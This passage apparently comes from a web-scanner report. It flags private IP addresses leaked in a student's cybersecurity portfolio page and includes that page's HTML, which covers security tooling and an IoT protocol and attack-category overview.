          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          172.16.0.2
          Solution

          Remove the private IP address from the HTTP response body. For comments, use JSP/ASP/PHP comment instead of HTML/JavaScript comment which can be seen by client browsers.

        2. GET https://beekmans.dev/
          Alert tags
          Alert description

          A private IP (such as 10.x.x.x, 172.x.x.x, 192.168.x.x) or an Amazon EC2 private hostname (for example, ip-10-0-56-78) has been found in the HTTP response body. This information might be helpful for further attacks targeting internal systems.

          Other info

          172.16.0.2

          172.16.0.3

          10.10.14.40:8888

          10.10.14.40:8888

          10.10.14.88:8888

          172.18.0.1

          172.18.0.100

          172.18.0.100

          10.10.14.161

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
